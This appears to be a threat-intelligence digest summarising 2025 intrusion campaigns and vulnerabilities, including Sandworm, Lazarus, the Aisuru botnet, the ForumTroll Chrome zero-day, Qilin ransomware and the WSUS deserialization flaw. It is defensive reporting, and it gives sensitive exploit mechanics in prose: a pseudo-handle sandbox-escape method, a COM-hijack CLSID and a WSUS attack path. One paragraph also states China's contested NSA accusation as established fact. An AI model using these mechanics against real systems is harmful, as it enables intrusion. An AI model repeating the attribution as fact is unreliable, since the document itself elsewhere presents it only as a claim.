Russian-linked attackers conducted multi-month intrusions against Ukrainian organizations, including a two-month campaign against a business services organization and a week-long attack against a local government entity. The attackers deployed the Localolive webshell (associated with Sandworm/Seashell Blizzard) to gain initial access by exploiting unpatched vulnerabilities on public-facing servers. They relied heavily on Living-off-the-Land tactics and dual-use tools to maintain persistent access, harvest credentials, perform memory dumps, establish remote access via RDP and OpenSSH, and exfiltrate sensitive information while maintaining a minimal footprint. The intrusions involved reconnaissance, credential harvesting through memory dumps targeting KeePass, registry manipulation, firewall modifications, and deployment of PowerShell backdoors and suspicious executables across multiple compromised systems.

Lab52 identified sophisticated modular loaders used by the Lazarus group in DreamJob campaigns during August 2025. The campaign, dubbed 'DreamLoaders', involves multiple deployment methods using legitimate system executables for DLL sideloading. Attackers target administrators of organizations to execute malware for credential extraction and further system compromise. Three deployment variants were observed: a trojanized TightVNC client (tnsviewer.exe), DLL loaders (webservices.dll and radcui.dll) executed via legitimate Windows binaries, and TSVIPSrv.dll deployed via malicious service. The loaders decrypt and load modular payloads stored in .mui files, with HideFirstLetter.dll attempting authentication to Microsoft tenants and accessing SharePoint servers via Microsoft Graph API. The modular architecture allows deployment of different payloads based on operational needs, with identical payloads found across multiple compromised systems indicating coordinated targeting.

The Aisuru botnet, which has infected at least 700,000 IoT devices since August 2024, has been overhauled to transition from conducting massive DDoS attacks to operating as a residential proxy service. The botnet previously executed record-breaking DDoS attacks reaching 6.3 terabits per second against KrebsOnSecurity and demonstrated capabilities of nearly 30 terabits per second. The botmasters updated their malware to enable infected devices to be rented to residential proxy providers, allowing cybercriminals to anonymize their traffic through compromised IoT devices including routers and security cameras. This shift supports large-scale data harvesting and AI content scraping operations. The botnet's infrastructure includes an SDK that forces Android-infected systems to query specific domains. Multiple ISPs have experienced significant operational impact with outbound DDoS attacks exceeding 1.5 terabits per second from Aisuru-infected customer devices, causing network disruptions and router line card failures. The botnet appears to have partnerships with various proxy networks and is contributing to the massive expansion of residential proxy services used for content scraping, ad fraud, credential stuffing, and AI training data collection.

Kaspersky discovered Operation ForumTroll in March 2025, a sophisticated espionage campaign targeting media outlets, universities, research centers, government organizations, and financial institutions in Russia and Belarus. The attack used personalized spear-phishing emails disguised as invitations to the Primakov Readings forum containing extremely short-lived malicious links. Infection occurred through a zero-day Chrome sandbox escape exploit (CVE-2025-2783) that required no user interaction beyond visiting the malicious website using Chromium-based browsers. The exploit leveraged a logical vulnerability in Windows pseudo handles, specifically exploiting the GetCurrentThread API function that returns pseudo handle -2. Chrome's IPC code checked for -1 (GetCurrentProcess) but not -2, allowing attackers to use RelayMessage to convert the pseudo handle into a real browser process thread handle via DuplicateHandle, enabling arbitrary code execution through thread manipulation (suspend, SetThreadContext, resume). Persistence was achieved via COM hijacking of twinapi.dll CLSID {AA509086-5Ca9-4C25-8F95-589D3C07B48A}. The campaign deployed LeetAgent spyware with commands in leetspeak (0xC033A4D=COMMAND, 0xECEC=EXEC, etc.) performing keylogging, file stealing (targeting .doc, .xls, .ppt, .rtf, .pdf extensions), and command execution. Kaspersky traced attacks back to 2022 and discovered Dante spyware, commercial surveillance tool developed by Memento Labs (formerly Hacking Team). Dante is VMProtect-packed with extensive anti-analysis techniques including anti-hooking via system call stubs, debug register checks, Windows Event Log monitoring for analysis tools, and anti-sandbox checks. The malware uses orchestrator architecture with AES-256-CBC encrypted modules, configuration stored with DANTEMARKER string, and self-deletion after specified days without C2 communication. Attribution confirmed through code similarities between exploit, loader, and Dante, plus shared infrastructure with Fastly.net CDN for C2. Mozilla Firefox also affected (CVE-2025-2857).

Qilin (formerly Agenda) is a highly active Ransomware-as-a-Service (RaaS) group that has been operational since July 2022. In the second half of 2025, Qilin published victim information at a pace of more than 40 cases per month, reaching a peak of 100 cases in June 2025. The group employs double-extortion tactics, combining file encryption with data exfiltration and public disclosure threats. Manufacturing is the most affected sector (23%), followed by professional and scientific services (18%), and wholesale trade (10%). The group uses sophisticated attack methods including VPN compromise via leaked credentials, credential harvesting with Mimikatz and custom tools, dual ransomware deployment (encryptor_1.exe via PsExec for lateral spread and encryptor_2.exe for network share encryption), legitimate tools for data exfiltration (Cyberduck to Backblaze cloud storage), and persistence mechanisms through scheduled tasks and registry modifications. Character encodings in attacker scripts suggest Eastern European or Russian-speaking origins. The group targets critical infrastructure including healthcare, construction, retail, education, and finance sectors.

A Pakistan-nexus threat actor APT36 (Transparent Tribe) has been observed targeting Indian government entities through spear-phishing attacks designed to deliver a Golang-based malware known as DeskRAT. The campaign, observed in August and September 2025, involves sending phishing emails containing ZIP file attachments or links to archives hosted on legitimate cloud services like Google Drive. The attacks specifically target BOSS (Bharat Operating System Solutions) Linux systems with a remote access trojan capable of establishing command-and-control using WebSockets. The malware supports multiple persistence mechanisms and file exfiltration capabilities. The threat actor has transitioned from using legitimate cloud storage platforms to dedicated staging servers for payload distribution.

Microsoft released emergency out-of-band security updates to patch CVE-2025-59287, a critical remote code execution vulnerability in Windows Server Update Service (WSUS). The flaw involves unsafe deserialization of untrusted data in a legacy serialization mechanism using BinaryFormatter. An unauthenticated remote attacker can exploit this vulnerability by sending crafted events to the GetCookie() endpoint, where encrypted AuthorizationCookie objects are decrypted using AES-128-CBC and deserialized without proper type validation, leading to remote code execution with SYSTEM privileges. The vulnerability has a CVSS score of 9.8 and is actively exploited in the wild. Eye Security observed exploitation on October 24, 2025, where attackers dropped a Base64-encoded .NET executable payload that executes arbitrary commands via cmd.exe using the 'aaaa' request header. The vulnerability affects Windows Server 2012, 2012 R2, 2016, 2019, 2022, and 2025 with WSUS server role enabled. Microsoft recommends immediate patching, or as a workaround, disabling the WSUS server role or blocking inbound traffic to ports 8530 and 8531.

North Korea-aligned Lazarus Group conducted a cyber-espionage campaign targeting European defense contractors involved in UAV/drone manufacturing in Central and Southeastern Europe. The campaign, part of Operation DreamJob, aimed to steal proprietary information and manufacturing know-how related to unmanned aerial vehicles. Three organizations were targeted, some of which produce military equipment currently deployed in Ukraine. The attackers used social engineering with fake job offers via LinkedIn, deploying trojanized PDF readers to deliver the ScoringMathTea RAT. Initial access was achieved through trojanized open-source projects from GitHub. The campaign aligns with North Korea's efforts to scale up its domestic drone program and may be connected to North Korean military presence in Russia during the Ukraine conflict.

China-based threat actors exploited the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East, government agencies in Africa and South America, and other organizations. The campaign involved deploying Zingdoor backdoor, ShadowPad Trojan, KrustyLoader, and various post-exploitation tools for credential theft and persistent access, likely for espionage purposes.

Multi-wave espionage campaign by SideWinder APT group targeting governmental entities in South Asia (India, Pakistan, Bangladesh, Sri Lanka) from March to September 2025. The campaign employed novel PDF and ClickOnce-based infection chains alongside traditional Word exploit vectors to deploy ModuleInstaller and StealerBot malware. Threat actors used sophisticated evasion techniques including geofencing, polymorphism, dynamic URLs, and time-locked payload delivery. The campaign targeted diplomatic institutions and government officials with highly specific phishing lures themed around regional political events, religious ceremonies (Hajj), military appointments, and inter-ministerial meetings. Attackers leveraged legitimate MagTek Reader Configuration application for DLL sideloading, maintaining valid certificate chains to evade detection while delivering multi-stage malware payloads.

A complex cyberespionage campaign targeting government, financial and industrial organizations in Asia, Africa, and Latin America. The campaign involves compromising Windows Server machines through SQL server exploitation, deploying custom APT implants (Neursite and NeuralExecutor) and Cobalt Strike framework. The attack uses sophisticated multi-stage DLL loading chains with MAC address-based targeting and Phantom DLL Hijacking for persistence.

Russian state-sponsored threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) swiftly shifted operations after the May 2025 public disclosure of its LOSTKEYS malware, operationalizing new malware families within five days. The threat actor has deployed a collection of related malware families connected via a delivery chain, including NOROBOT (also known as BAITSWITCH), YESROBOT, and MAYBEROBOT (also known as SIMPLEFIX). The infection chain begins with an updated COLDCOPY 'ClickFix' lure disguised as a CAPTCHA that tricks users into executing a malicious DLL via rundll32. NOROBOT serves as a downloader that retrieves subsequent stages from hardcoded C2 servers. Initially, COLDRIVER deployed YESROBOT, a cumbersome Python backdoor requiring a full Python 3.8 installation, but quickly replaced it with MAYBEROBOT, a more flexible PowerShell backdoor. The malware has undergone multiple iterations with constant evolution in the infection chain, including simplification for deployment success and later re-introduction of complexity through split cryptography keys to evade detection. COLDRIVER targets high-profile individuals in NGOs, policy advisors, and dissidents for intelligence collection. The group demonstrates increased development tempo and aggressive deployment against high-value targets.

China's Ministry of State Security (MSS) claims the U.S. National Security Agency (NSA) conducted a multi-stage cyber attack targeting China's National Time Service Center (NTSC), which is responsible for maintaining Beijing Time. The attack involved exploiting SMS service vulnerabilities, credential theft, and deployment of 42 specialized cyber warfare tools.

Salt Typhoon (aka Earth Estries, GhostEmperor, UNC2286), a China-linked cyber espionage APT group, conducted an intrusion against a European telecommunications organization in July 2025. The attack involved exploitation of Citrix NetScaler Gateway, DLL sideloading via legitimate antivirus software to deploy SNAPPYBEE backdoor, and use of VPS infrastructure for command and control. Darktrace detected early-stage intrusion activity including tooling delivery and C2 communications before escalation.

The US National Security Agency (NSA) conducted a sophisticated multi-stage cyberattack campaign against China's National Time Service Center from March 2022 to June 2024. The attack began by exploiting vulnerabilities in foreign brand mobile phones to steal credentials, followed by deploying advanced custom malware frameworks to establish persistent access and conduct espionage on critical timing infrastructure systems.

Nation-state hackers, suspected to be China-linked threat group UNC5291, breached F5's network and stole undisclosed BIG-IP security vulnerabilities and source code. The attackers were active in F5's network for at least one year. Following the disclosure, Shadowserver Foundation identified over 266,000 F5 BIG-IP instances exposed online, with nearly half located in the United States. F5 has released patches for 44 vulnerabilities including those stolen in the breach and urges immediate updates.

Threat actors exploited a recently patched remote code execution vulnerability (CVE-2025-20352) in Cisco networking devices to deploy a rootkit targeting Cisco switches and unprotected Linux systems. The campaign also attempted to exploit CVE-2017-3881, a seven-year-old vulnerability. The rootkit features a UDP controller with capabilities to bypass security controls, manipulate logs, and enable lateral movement.

Cisco Talos uncovered a new attack linked to Famous Chollima (Lazarus subgroup), a DPRK-aligned threat actor targeting job seekers through fake employment offers. The campaign delivers trojanized Node.js applications containing evolved BeaverTail and OtterCookie malware with new keylogging, screenshotting, and data exfiltration capabilities. The malware was distributed via NPM package 'node-nvm-ssh' and targets cryptocurrency wallets, credentials, and sensitive files.

A coordinated campaign targeting macOS users, particularly developers, through fake software download websites impersonating trusted platforms like Homebrew, TradingView, and LogMeIn. The campaign uses social engineering tactics to deliver Odyssey Stealer and AMOS (Atomic macOS Stealer) malware through base64-encoded commands executed in Terminal.

Long-running cyber-espionage campaign by Confucius APT group targeting Pakistan government agencies, military organizations, defense contractors, and critical industries. The campaign evolved from December 2024 through August 2025, demonstrating sophisticated tactics including weaponized Office documents, malicious LNK files, DLL side-loading, and deployment of WooperStealer and Python-based AnonDoor backdoor for persistent access and data exfiltration.